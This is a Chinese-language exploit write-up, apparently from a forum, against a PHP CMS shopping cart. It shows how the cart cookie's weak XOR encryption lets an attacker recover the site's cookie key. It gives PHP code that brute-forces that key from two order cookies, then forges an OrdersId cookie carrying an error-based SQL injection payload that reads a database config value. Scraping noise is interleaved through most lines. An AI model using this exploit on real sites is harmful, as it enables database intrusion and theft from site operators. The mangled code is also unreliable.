www.xxx.com/plus/search.php?keyword=
$ v% t; o+ v! z, A: ]7 X F r在 include/shopcar.class.php中
3 U4 X: z1 _3 g# |先看一下这个shopcar类是如何生成cookie的
+ e0 z U' Z% _/ ~, \4 E. }239 function saveCookie($key,$value)- w8 d- o y" ?) Z
240 {& V: k; s. ]* S( F- X3 T3 _6 j
241 if(is_array($value)), |) ~, r, y/ P8 l4 A5 V
242 {
3 K- m% |1 o4 f i- @243 $value = $this->enCrypt($this->enCode($value));
$ }7 g8 f0 W& X& A4 u244 }7 ^! A) k0 R; d8 ]+ O
245 else( U n& S' A/ D: s1 `
246 {
) N& e% P2 D* m M- J247 $value = $this->enCrypt($value);
& s# {& t; c# t4 g' z- @ X0 v248 }
6 x+ \6 g0 P B: [, n6 n249 setcookie($key,$value,time()+36000,’/');7 \8 j/ M4 I6 m7 _% X* J+ d; \7 \
250 }6 k/ Z- Q! A! D1 `
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
8 g! ~( k7 Q: L186 function enCrypt($txt)+ _5 _9 w& `3 A0 O
187 {
7 U2 X( n7 h" ^1 l+ J188 srand((double)microtime() * 1000000);
, j$ V5 o9 m- c# T1 U189 $encrypt_key = md5(rand(0, 32000));$ H, U( g" N% }7 ]! ?
190 $ctr = 0;, N7 _$ X6 Z* V Z& D8 K
191 $tmp = ”;5 u/ G% ^7 S+ [ q6 ?
192 for($i = 0; $i < strlen($txt); $i++)
4 \" ]5 X$ F# o* R193 {" O4 O: [) S2 ]; u6 R8 p
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;+ A A" G# _9 a$ y {1 e
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);) T$ ]7 o! m7 Q5 R% f) q$ K
196 }5 k' z& ?, p+ |7 A' @
197 return base64_encode($this->setKey($tmp));/ @# f" Z& z! b7 z% R
198 }& [, T1 c, a% H, x) v- T
213 function setKey($txt)- `6 r! u5 ?: Q9 M* T; p# W+ D1 t
214 {
* u' I1 d5 o! a1 z% U215 global $cfg_cookie_encode;
- f9 \. n2 q. Y, p( j216 $encrypt_key = md5(strtolower($cfg_cookie_encode));1 w! M3 _/ Z2 W3 o3 e
217 $ctr = 0;1 |- G( I( v! h1 S, X' S1 E) B+ M
218 $tmp = ”;5 k. D$ D' {7 y% e
219 for($i = 0; $i < strlen($txt); $i++)
n2 h+ T4 y' R9 V220 {
" e( v; T" B7 q4 N9 _9 f221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( O W1 O# P) Q+ y9 A$ C222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];* V# B' J4 M7 X) l: k5 M
223 }# t% b1 j& v$ ]: ]
224 return $tmp;( p/ g0 _7 L' n/ {
225 }2 x, K# t! h6 `" G
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的/ a7 i: V! i0 r
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。! Y: }, R8 P) g8 G* ~
具体代码如下:8 I" i7 s& I- z# k! x4 V
<?php( |6 e$ T1 c9 S; H( H
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here! J8 M% g) f" V- {( k6 b
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here& W* ?! I6 R5 W' l2 u. R
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here7 J# F$ u( _2 F) v" x( |* c8 J
function reStrCode($code,$string)* ~; B1 t8 ~0 i6 N. L+ v) I
{9 ~+ E/ d1 i7 [' k# ^
$code = base64_decode($code);
$ R, b' s1 ^9 p" A J# D3 F$key = “”;4 v" H3 P! [2 y+ z, X; C1 Q
for($i=0 ; $i<32 ; $i++)
/ P4 L% u6 F) d' n H O{
3 b! M$ D5 G) K; S; p9 ~$key .= $string[$i] ^ $code[$i];
6 ?/ r9 j4 h/ m3 S1 R} J. F3 K2 C9 n1 O) I$ u' R* M
return $key;) y5 u8 n5 v4 e# [, n7 N I7 _
}
+ v3 m# m0 j+ F& J9 [* C2 ^1 Hfunction getKeys($cookie,$plantxt)2 U; z: p$ S! h+ m5 Q3 N
{+ ^6 ?5 o) v+ s
$tmp = $cookie;
" M& G4 q; |; t8 F0 `' H' m$results = array();
' L8 o1 u# C9 |9 Q8 F3 R7 \for($j=0 ; $j < 32000; $j++)7 P0 n$ J! O# }' I
{
9 |7 L+ q$ P4 j- P
% A% k: \: z- ~1 m& t% }/ D$txt = $plantxt;
) Y1 C% Q5 _/ X5 z0 D9 I& Y! u: z$ctr = 0;
9 G$ i O9 o; z$tmp = ”;" m) e! P, ?: |$ Z( g
$encrypt_key = md5($j);
) i& K' ?* h! U6 p) W& @) Afor($i =0; $i < strlen($txt); $i ++)( Y' j# c, h( V1 c: m# t: ^1 G
{
6 E9 o4 ^. A/ {9 t# U& F7 y$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
. i* q0 N% z1 g) K" c/ A5 \! ?. g$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
# ]. @6 ~, z. o8 l" q' n}8 y; G2 A. W: `1 c; O
$string = $tmp;
8 |% ?3 m t- a5 p( V$ A$code = $cookie;, F, ]# W3 G4 E: ~
$result = reStrCode($code,$string); O8 x2 a- _$ ]) Q( H
if(eregi(‘^[a-z0-9]+$’,$result))3 n% T# v, r0 l6 @" e2 I5 L
{# Y, x# [% n* Z! K& ]
echo $result.”\n”;! R6 L5 J# I7 @4 I
$results[] = $result;- H5 K+ I; D1 f7 Q: X4 L
}, J" e* |5 K8 J. z M2 {
}# S0 f u) Y9 p5 p, E
return $results;
' ?5 H$ ~/ v* a+ @: O5 y}
- D" P1 M% i& e) d B$results1 = getKeys($cookie1,$plantxt);
, k( E# _% e. \; W6 i8 D$results2 = getKeys($cookie2,$plantxt);
! |3 v) `2 V, pprint “\n——————–real key————————–\n”;$ j& r; t$ C( U9 P% X v
foreach($results1 as $test1)( ~, c0 f$ G+ k( ?$ ?# N
{6 _4 y& [- F: k( O7 G! x4 X+ `. {- Y
foreach($results2 as $test2)# q$ H. j% L' I ^7 ~! u3 ?; W
{
( _, o7 L R8 rif($test1 == $test2)6 Z, ^8 \! Y" k9 |" R
{7 O J: m/ A) Y0 f2 ?8 X
echo $test1.”\n”; h+ ?5 C, ~% |" P
} ?' w5 b" G9 @5 ?, W" \
}
" x- i, o, H3 I2 {}# l/ |2 V! c# T" R1 m
?>0 T6 y# P4 m& `( w+ J
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
+ `5 p% K* g6 z) h( U% K: _ ^) Pplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
' n% U; ^9 z0 f" s2 w然后推算出md5(strtolower($cfg_cookie_encode))
* O; w2 D3 J, X ~7 N8 I/ k( l得到这个key之后,我们就可以构造任意购物车的cookie P I. F5 B# b- g2 q0 Q$ i
接着看% C; z7 F h7 c4 G( B, p$ m
20 class MemberShops; ~7 k9 O/ e" w9 e0 m& ~6 K( ?% u: V
21 {
' ^/ h1 v! p5 X( q0 N* N% ^22 var $OrdersId;
; D, T8 P* h3 F% z+ m& p, A& D1 i _23 var $productsId;
) J+ f0 `- [. q. P/ z3 h! ^9 A240 u8 C; D* N. M: ]. s$ i+ A6 K# J
25 function __construct()
f8 O/ D( N5 J" p7 Z+ Z7 L26 {
# {$ {1 E# k( _" U) Z5 n j27 $this->OrdersId = $this->getCookie(“OrdersId”);
D: f( g* i$ k4 Z8 z& y: R' h28 if(empty($this->OrdersId))
0 @; y. k v2 w) q& V$ C& i- d: V29 {
$ m# s8 y/ ~8 n- B30 $this->OrdersId = $this->MakeOrders();1 i$ G* R4 z5 p. N3 c* `/ `
31 }, N$ ]% L& m7 N+ p- o* L/ W$ z' b
32 }3 x) o5 c+ P! H8 G `! u
发现OrderId是从cookie里面获取的
2 g1 G% A4 q, C. q- I# A, C Y, P然后, I8 h6 o+ v! G/ M1 h
/plus/carbuyaction.php中的
5 Q8 o" J/ h# I9 {, D0 q. {& w7 {29 $cart = new MemberShops();
8 e) C p& K" v6 [! Q5 b2 z39 $OrdersId = $cart->OrdersId; //本次记录的订单号
4 p* A x8 ?. i* E7 |- u, L……
( R1 {. A8 r; U8 h: {173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);4 b$ P& j( D% Z, j& |4 `" j
接着我们就可以注入了# y/ o+ G. }. v" F7 |, C- \
通过利用下面代码生成cookie:: c% n: }& `+ m
<?php
4 H5 @$ @2 y& H6 i+ p$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;1 q) S, O7 j& w4 D' B
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
( r! ]5 A! e* q3 s5 l5 K* H* S7 Ufunction setKey($txt)! n! K$ k" [/ E' W/ @
{
5 [* f. g1 G h. e, N3 M7 Dglobal $encrypt_key;7 {9 R. G% g1 [
$ctr = 0;4 n% h6 q6 E# l- N7 [0 x8 m
$tmp = ”;, O5 y7 i9 q- i
for($i = 0; $i < strlen($txt); $i++)0 a; E' }' U0 L; p; o
{
# f( g* N- N; P. H. b, S" r, X$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% a* G% [- j3 T7 j6 a$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
' d* G$ }0 P! O0 n( Z! _}
; m+ v1 K. b) g/ ^ @) Q9 o( f5 K( {return $tmp;. s! q' Z8 P2 {7 U) M+ J
}
c) N( F7 {! t1 U. Q+ Tfunction enCrypt($txt)/ ]3 E% {- p' \! G% |4 s6 y
{
, q4 R: _6 P( u' qsrand((double)microtime() * 1000000);
+ E1 o0 L8 ?% @( Q% I% W! n$encrypt_key = md5(rand(0, 32000));& ? n( T6 c) p% v' Y2 B
$ctr = 0;
) b# {% X C8 M' G; x+ t$tmp = ”; S3 N7 X) w! R3 ?/ [& v3 f9 J! q
for($i = 0; $i < strlen($txt); $i++)
) [; y. V7 J6 z- \0 r{, F. q1 V4 b1 K, H/ J! p( s
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;& {* w9 D7 I$ b
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
( ?" ?& X. @# A; H5 C}) |1 ?1 \3 d1 j" k4 n, Y3 n: b
return base64_encode(setKey($tmp));
8 L& T) s1 R1 v2 ], S* ^+ A}8 m6 U: {5 s2 [$ q1 l" m
for($dest =0;$dest = enCrypt($txt);)
5 z3 z( X6 b4 N( h G9 M, C{0 X- ?. k7 s, R; x
if(!strpos($dest,’+'))' Z0 h0 X x5 C5 r) v6 O4 [5 E
{, e! n/ f8 t/ r6 S- O) G
break;
}) a8 g- n, v: ?! Y}
% s2 z, a, X! M0 y: z6 Z7 C; }}
8 z2 b$ R9 T5 N& ]) K% x! \) Kecho $dest.”\n”;
/ N; G4 \1 @ Z8 a& Q?>
& K# h0 B$ ]3 k1 n, O9 u% g& ^6 K9 B2 S1 I- \& P
|